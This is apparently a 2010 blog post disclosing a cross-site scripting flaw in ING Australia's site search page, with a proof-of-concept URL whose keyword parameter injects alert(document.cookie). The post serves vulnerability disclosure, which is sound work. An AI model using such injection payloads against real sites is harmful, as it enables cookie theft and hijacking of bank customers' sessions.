ING XSS

By
Eldar Marcussen
on January 18, 2010 10:23 PM | | Comments (0)
I found a XSS vulnerability in ING's australian website; ING - XSS - PoC.jpg
The proof of concept url used to illustrate the vulnerability is: http://www.ing.com.au/personal/Search.aspx?keyword=%27;alert(document.cookie);test=%27

Bookmark and Share

Tags:

Leave a comment

Search

March 2010

Sun Mon Tue Wed Thu Fri Sat
  1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31      
No Clean Feed - Stop Internet Censorship in Australia

Tag Cloud

Creative Commons License
This weblog is licensed under a Creative Commons License.